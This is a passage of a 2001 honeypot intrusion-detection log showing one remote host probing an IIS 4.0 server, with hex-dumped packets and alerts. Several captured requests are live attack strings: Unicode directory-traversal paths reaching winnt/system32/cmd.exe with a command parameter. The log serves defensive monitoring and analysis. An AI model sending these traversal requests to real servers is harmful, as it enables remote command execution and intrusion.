IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=13937 flags=0 offset=0 TTL=118 chksum=7466
TCP: port=2735 -> dport: 80 flags=*****R** seq=478857824
ack=0 off=5 res=0 win=0 urp=0 chksum=3266
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25531) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=14193 flags=0 offset=0 TTL=118 chksum=7206
TCP: port=3967 -> dport: 80 flags=******S* seq=483647421
ack=0 off=6 res=0 win=8192 urp=0 chksum=47761
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25532) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=35846 flags=0 offset=0 TTL=128 chksum=48528
TCP: port=80 -> dport: 3967 flags=***A**S* seq=549229
ack=483647422 off=6 res=0 win=8760 urp=0 chksum=22227
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25533) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=14449 flags=0 offset=0 TTL=118 chksum=23338
TCP: port=2735 -> dport: 80 flags=*****R** seq=478857824
ack=478857824 off=5 res=0 win=0 urp=0 chksum=9687
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25534) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=19057 flags=0 offset=0 TTL=119 chksum=2090
TCP: port=3967 -> dport: 80 flags=***A**** seq=483647422
ack=549230 off=5 res=0 win=8760 urp=0 chksum=28304
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25535) [2001-09-18 10:21:36] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=19313 flags=0 offset=0 TTL=119 chksum=1737
TCP: port=3967 -> dport: 80 flags=***AP*** seq=483647422
ack=549230 off=5 res=0 win=8760 urp=0 chksum=5253
Payload: length = 91
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 %5c../Admin.dll
030 : 6E 2E 64 6C 6C 20 48 54 54 50 2F 31 2E 30 0D 0A n.dll HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F ection: clo
----------------------------------------------------------------------------
--
#(2 - 25536) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=279 ID=36870 flags=0 offset=0 TTL=128 chksum=47269
TCP: port=80 -> dport: 3967 flags=***AP*** seq=549230
ack=483647519 off=5 res=0 win=8663 urp=0 chksum=13828
Payload: length = 239
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 35 3A 31 37 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:17 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 25537) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=37126 flags=0 offset=0 TTL=128 chksum=47252
TCP: port=80 -> dport: 3967 flags=***A***F seq=549469
ack=483647519 off=5 res=0 win=8663 urp=0 chksum=28064
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25538) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=24945 flags=0 offset=0 TTL=118 chksum=61993
TCP: port=3967 -> dport: 80 flags=*****R** seq=483647519
ack=0 off=5 res=0 win=0 urp=0 chksum=61929
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25539) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=25201 flags=0 offset=0 TTL=118 chksum=61733
TCP: port=3978 -> dport: 80 flags=******S* seq=483647541
ack=0 off=6 res=0 win=8192 urp=0 chksum=47630
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25540) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=37894 flags=0 offset=0 TTL=128 chksum=46480
TCP: port=80 -> dport: 3978 flags=***A**S* seq=549530
ack=483647542 off=6 res=0 win=8760 urp=0 chksum=21795
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25541) [2001-09-18 10:21:36] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=28017 flags=0 offset=0 TTL=118 chksum=9770
TCP: port=3967 -> dport: 80 flags=*****R** seq=483647519
ack=483647519 off=5 res=0 win=0 urp=0 chksum=62710
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25542) [2001-09-18 10:21:37] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=35953 flags=0 offset=0 TTL=119 chksum=50729
TCP: port=3978 -> dport: 80 flags=***A**** seq=483647542
ack=549531 off=5 res=0 win=8760 urp=0 chksum=27872
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25543) [2001-09-18 10:21:37] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=157 ID=36209 flags=0 offset=0 TTL=119 chksum=50356
TCP: port=3978 -> dport: 80 flags=***AP*** seq=483647542
ack=549531 off=5 res=0 win=8760 urp=0 chksum=28493
Payload: length = 111
000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25544) [2001-09-18 10:21:37] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=38918 flags=0 offset=0 TTL=128 chksum=44856
TCP: port=80 -> dport: 3978 flags=***AP*** seq=549531
ack=483647659 off=5 res=0 win=8643 urp=0 chksum=8479
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 35 3A 31 37 20 47 4D 54 0D 0A 43 16:05:17 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25545) [2001-09-18 10:21:37] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=39174 flags=0 offset=0 TTL=128 chksum=45204
TCP: port=80 -> dport: 3978 flags=***A***F seq=550135
ack=483647659 off=5 res=0 win=8643 urp=0 chksum=27267
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25546) [2001-09-18 10:21:37] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=47985 flags=0 offset=0 TTL=118 chksum=38953
TCP: port=3978 -> dport: 80 flags=*****R** seq=483647659
ack=0 off=5 res=0 win=0 urp=0 chksum=61778
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25547) [2001-09-18 10:21:37] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=48241 flags=0 offset=0 TTL=118 chksum=38693
TCP: port=4013 -> dport: 80 flags=******S* seq=483647897
ack=0 off=6 res=0 win=8192 urp=0 chksum=47239
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25548) [2001-09-18 10:21:37] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=40198 flags=0 offset=0 TTL=128 chksum=44176
TCP: port=80 -> dport: 4013 flags=***A**S* seq=550221
ack=483647898 off=6 res=0 win=8760 urp=0 chksum=20713
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25549) [2001-09-18 10:21:37] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=48497 flags=0 offset=0 TTL=118 chksum=54825
TCP: port=3978 -> dport: 80 flags=*****R** seq=483647659
ack=483647659 off=5 res=0 win=0 urp=0 chksum=62419
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25550) [2001-09-18 10:21:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=4722 flags=0 offset=0 TTL=119 chksum=16425
TCP: port=4013 -> dport: 80 flags=***A**** seq=483647898
ack=550222 off=5 res=0 win=8760 urp=0 chksum=26790
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25551) [2001-09-18 10:21:38] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=185 ID=4978 flags=0 offset=0 TTL=119 chksum=16024
TCP: port=4013 -> dport: 80 flags=***AP*** seq=483647898
ack=550222 off=5 res=0 win=8760 urp=0 chksum=3789
Payload: length = 127
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 25552) [2001-09-18 10:21:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=305 ID=41734 flags=0 offset=0 TTL=128 chksum=42379
TCP: port=80 -> dport: 4013 flags=***AP*** seq=550222
ack=483648043 off=5 res=0 win=8615 urp=0 chksum=48807
Payload: length = 265
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 35 3A 31 38 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:18 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C th: 126....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65 d><body>The
file
0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20 name, directory
0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20 name, or volume
0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20 label syntax is
0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64 incorrect. </bod
100 : 79 3E 3C 2F 68 74 6D 6C 3E y></html>
----------------------------------------------------------------------------
--
#(2 - 25553) [2001-09-18 10:21:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=41990 flags=0 offset=0 TTL=128 chksum=42388
TCP: port=80 -> dport: 4013 flags=***A***F seq=550487
ack=483648043 off=5 res=0 win=8615 urp=0 chksum=26524
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25554) [2001-09-18 10:21:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=61298 flags=0 offset=0 TTL=118 chksum=25640
TCP: port=4013 -> dport: 80 flags=*****R** seq=483648043
ack=2869794125 off=5 res=0 win=0 urp=0 chksum=44884
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25555) [2001-09-18 10:21:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=61554 flags=0 offset=0 TTL=118 chksum=25380
TCP: port=4030 -> dport: 80 flags=******S* seq=483648049
ack=0 off=6 res=0 win=8192 urp=0 chksum=47070
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25556) [2001-09-18 10:21:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=43270 flags=0 offset=0 TTL=128 chksum=41104
TCP: port=80 -> dport: 4030 flags=***A**S* seq=551192
ack=483648050 off=6 res=0 win=8760 urp=0 chksum=19573
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25557) [2001-09-18 10:21:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=61810 flags=0 offset=0 TTL=118 chksum=41512
TCP: port=4013 -> dport: 80 flags=*****R** seq=483648043
ack=483648043 off=5 res=0 win=0 urp=0 chksum=61616
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25558) [2001-09-18 10:21:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=7795 flags=0 offset=0 TTL=119 chksum=13352
TCP: port=4030 -> dport: 80 flags=***A**** seq=483648050
ack=551193 off=5 res=0 win=8760 urp=0 chksum=25650
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25559) [2001-09-18 10:21:38] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=8051 flags=0 offset=0 TTL=119 chksum=12999
TCP: port=4030 -> dport: 80 flags=***AP*** seq=483648050
ack=551193 off=5 res=0 win=8760 urp=0 chksum=42860
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 25560) [2001-09-18 10:21:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=305 ID=44550 flags=0 offset=0 TTL=128 chksum=39563
TCP: port=80 -> dport: 4030 flags=***AP*** seq=551193
ack=483648147 off=5 res=0 win=8663 urp=0 chksum=47411
Payload: length = 265
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 35 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:19 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C th: 126....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65 d><body>The
file
0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20 name, directory
0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20 name, or volume
0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20 label syntax is
0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64 incorrect. </bod
100 : 79 3E 3C 2F 68 74 6D 6C 3E y></html>
----------------------------------------------------------------------------
--
#(2 - 25561) [2001-09-18 10:21:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=44806 flags=0 offset=0 TTL=128 chksum=39572
TCP: port=80 -> dport: 4030 flags=***A***F seq=551458
ack=483648147 off=5 res=0 win=8663 urp=0 chksum=25384
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25562) [2001-09-18 10:21:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=17523 flags=0 offset=0 TTL=118 chksum=3880
TCP: port=4030 -> dport: 80 flags=*****R** seq=483648147
ack=0 off=5 res=0 win=0 urp=0 chksum=61238
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25563) [2001-09-18 10:21:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=17779 flags=0 offset=0 TTL=118 chksum=3620
TCP: port=4070 -> dport: 80 flags=******S* seq=483904361
ack=0 off=6 res=0 win=8192 urp=0 chksum=52858
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25564) [2001-09-18 10:21:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=45574 flags=0 offset=0 TTL=128 chksum=38800
TCP: port=80 -> dport: 4070 flags=***A**S* seq=551823
ack=483904362 off=6 res=0 win=8760 urp=0 chksum=24730
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25565) [2001-09-18 10:21:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=18035 flags=0 offset=0 TTL=118 chksum=19752
TCP: port=4030 -> dport: 80 flags=*****R** seq=483648147
ack=483648147 off=5 res=0 win=0 urp=0 chksum=61391
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25566) [2001-09-18 10:21:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30067 flags=0 offset=0 TTL=119 chksum=56615
TCP: port=4070 -> dport: 80 flags=***A**** seq=483904362
ack=551824 off=5 res=0 win=8760 urp=0 chksum=30807
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25567) [2001-09-18 10:21:39] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=30323 flags=0 offset=0 TTL=119 chksum=56262
TCP: port=4070 -> dport: 80 flags=***AP*** seq=483904362
ack=551824 off=5 res=0 win=8760 urp=0 chksum=47249
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 25568) [2001-09-18 10:21:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=46854 flags=0 offset=0 TTL=128 chksum=36920
TCP: port=80 -> dport: 4070 flags=***AP*** seq=551824
ack=483904459 off=5 res=0 win=8663 urp=0 chksum=13205
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 35 3A 32 30 20 47 4D 54 0D 0A 43 16:05:20 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
